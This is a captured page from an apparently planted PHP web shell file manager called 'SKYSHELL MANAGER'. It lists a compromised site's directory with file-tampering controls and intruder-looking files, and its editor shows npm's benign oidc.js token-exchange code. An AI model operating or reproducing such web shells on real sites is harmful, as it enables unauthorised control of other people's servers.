📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: oidc.js
const { log } = require('proc-log') const npmFetch = require('npm-registry-fetch') const ciInfo = require('ci-info') const fetch = require('make-fetch-happen') const npa = require('npm-package-arg') const libaccess = require('libnpmaccess') /** * Handles OpenID Connect (OIDC) token retrieval and exchange for CI environments. * * This function is designed to work in Continuous Integration (CI) environments such as GitHub Actions, * GitLab, and CircleCI. It retrieves an OIDC token from the CI environment, exchanges it for an npm token, and * sets the token in the provided configuration for authentication with the npm registry. * * This function is intended to never throw, as it mutates the state of the `opts` and `config` objects on success. * OIDC is always an optional feature, and the function should not throw if OIDC is not configured by the registry. * * @see https://github.com/watson/ci-info for CI environment detection. * @see https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/about-security-hardening-with-openid-connect for GitHub Actions OIDC. * @see https://circleci.com/docs/openid-connect-tokens/ for CircleCI OIDC. */ async function oidc ({ packageName, registry, opts, config }) { /* * This code should never run when people try to publish locally on their machines. * It is designed to execute only in Continuous Integration (CI) environments. */ try { if (!( /** @see https://github.com/watson/ci-info/blob/v4.2.0/vendors.json#L152 */ ciInfo.GITHUB_ACTIONS || /** @see https://github.com/watson/ci-info/blob/v4.2.0/vendors.json#L161C13-L161C22 */ ciInfo.GITLAB || /** @see https://github.com/watson/ci-info/blob/v4.2.0/vendors.json#L78 */ ciInfo.CIRCLE )) { return undefined } /** * Check if the environment variable `NPM_ID_TOKEN` is set. * In GitLab CI, the ID token is provided via an environment variable, * with `NPM_ID_TOKEN` serving as a predefined default. For consistency, * all supported CI environments are expected to support this variable. * In contrast, GitHub Actions uses a request-based approach to retrieve the ID token. * The presence of this token within GitHub Actions will override the request-based approach. * This variable follows the prefix/suffix convention from sigstore (e.g., `SIGSTORE_ID_TOKEN`). * @see https://docs.sigstore.dev/cosign/signing/overview/ */ let idToken = process.env.NPM_ID_TOKEN if (!idToken && ciInfo.GITHUB_ACTIONS) { /** * GitHub Actions provides these environment variables: * - `ACTIONS_ID_TOKEN_REQUEST_URL`: The URL to request the ID token. * - `ACTIONS_ID_TOKEN_REQUEST_TOKEN`: The token to authenticate the request. * Only when a workflow has the following permissions: * ``` * permissions: * id-token: write * ``` * @see https://docs.github.com/en/actions/security-for-github-actions/security-hardening-your-deployments/configuring-openid-connect-in-cloud-providers#adding-permissions-settings */ if (!( process.env.ACTIONS_ID_TOKEN_REQUEST_URL && process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN )) { log.silly('oidc', 'Skipped because incorrect permissions for id-token within GitHub workflow') return undefined } /** * The specification for an audience is `npm:registry.npmjs.org`, * where "registry.npmjs.org" can be any supported registry. */ const audience = `npm:${new URL(registry).hostname}` const url = new URL(process.env.ACTIONS_ID_TOKEN_REQUEST_URL) url.searchParams.append('audience', audience) const startTime = Date.now() const response = await fetch(url.href, { retry: opts.retry, headers: { Accept: 'application/json', Authorization: `Bearer ${process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN}`, }, }) const elapsedTime = Date.now() - startTime log.http( 'fetch', `GET ${url.href} ${response.status} ${elapsedTime}ms` ) const json = await response.json() if (!response.ok) { log.verbose('oidc', `Failed to fetch id_token from GitHub: received an invalid response`) return undefined } if (!json.value) { log.verbose('oidc', `Failed to fetch id_token from GitHub: missing value`) return undefined } idToken = json.value } if (!idToken) { log.silly('oidc', 'Skipped because no id_token available') return undefined } const parsedRegistry = new URL(registry) const regKey = `//${parsedRegistry.host}${parsedRegistry.pathname}` const authTokenKey = `${regKey}:_authToken` const escapedPackageName = npa(packageName).escapedName let response try { response = await npmFetch.json(new URL(`/-/npm/v1/oidc/token/exchange/package/${escapedPackageName}`, registry), { ...opts, [authTokenKey]: idToken, // Use the idToken as the auth token for the request method: 'POST', }) } catch (error) { log.verbose('oidc', `Failed token exchange request with body message: ${error?.body?.message || 'Unknown error'}`) return undefined } if (!response?.token) { log.verbose('oidc', 'Failed because token exchange was missing the token in the response body') return undefined } /* * The "opts" object is a clone of npm.flatOptions and is passed through the `publish` command, * eventually reaching `otplease`. To ensure the token is accessible during the publishing process, * it must be directly attached to the `opts` object. * Additionally, the token is required by the "live" configuration or getters within `config`. */ opts[authTokenKey] = response.token config.set(authTokenKey, response.token, 'user') log.verbose('oidc', `Successfully retrieved and set token`) try { const isDefaultProvenance = config.isDefault('provenance') // CircleCI doesn't support provenance yet, so skip the auto-enable logic if (isDefaultProvenance && !ciInfo.CIRCLE) { const [headerB64, payloadB64] = idToken.split('.') if (headerB64 && payloadB64) { const payloadJson = Buffer.from(payloadB64, 'base64').toString('utf8') const payload = JSON.parse(payloadJson) if ( (ciInfo.GITHUB_ACTIONS && payload.repository_visibility === 'public') || // only set provenance for gitlab if the repo is public and SIGSTORE_ID_TOKEN is available (ciInfo.GITLAB && payload.project_visibility === 'public' && process.env.SIGSTORE_ID_TOKEN) ) { const visibility = await libaccess.getVisibility(packageName, opts) if (visibility?.public) { log.verbose('oidc', `Enabling provenance`) opts.provenance = true config.set('provenance', true, 'user') } } } } } catch (error) { log.verbose('oidc', `Failed to set provenance with message: ${error?.message || 'Unknown error'}`) } } catch (error) { log.verbose('oidc', `Failure with message: ${error?.message || 'Unknown error'}`) } return undefined } module.exports = { oidc, }
Save